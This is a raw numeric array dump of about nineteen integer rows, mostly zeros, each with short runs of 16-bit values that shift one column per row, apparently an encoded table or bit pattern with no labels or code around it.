[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 27268, 41281, 19174, 30726, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 6144, 50688, 8576, 23648, 10776, 30406, 9025],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 53636, 47169, 47078, 62726, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 44032, 51968, 60096, 5296, 684, 30155, 41240],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 14468, 53057, 9446, 29190, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 29696, 15616, 59200, 37840, 3188, 46971],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 40836, 58945, 37350, 61190, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 50176, 37120, 3136, 61712, 36036, 50321, 3162],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 1668, 64833, 65254, 27654, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 51200, 12800, 23680, 54048, 40392, 50, 39013],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 28036, 5185, 27622, 59654, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 7168, 42752, 33216, 624, 52252, 28327, 19980],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 54404, 11073, 55526, 26118, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 22016, 58752, 35967],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 15236, 16961, 17894, 58118, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 46080, 36096, 43840, 57552, 26292, 28045, 20142],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 41604, 22849, 45798, 24582, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 30720, 56832, 10112, 60896, 55928, 37854, 50761],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 2436, 28737, 8166, 56582, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 49920, 59584, 25648, 21132, 20163, 53952],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 28804, 34625, 36070, 23046, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 52224, 37632, 19648, 55600, 1740, 33859],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 55172, 40513, 63974, 55046, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 41984, 51456, 39488, 42128, 21924, 37833, 39618],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 16004, 46401, 26342, 21510, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 10240, 51712, 33408, 27808, 4136, 15818, 45293],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 42372, 52289, 54246, 53510, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 64512, 7936, 8128, 63984, 34300, 4639, 33588],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 3204, 58177, 16614, 19974, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 54784, 34176, 52576, 7256, 33479],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 29572, 64065, 44518, 51974, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 17664, 55616, 64592, 51604, 21317, 42134],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 55940, 4417, 6886, 18438, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 55296, 62976, 28032, 3936, 28376, 18934, 7249],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 16772, 10305, 34790, 50438, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 27648, 47872, 9920, 33712, 22124, 62651, 29544],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 43140, 16193, 62694, 16902, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 9216, 10496, 49728, 58000, 4644, 11275],
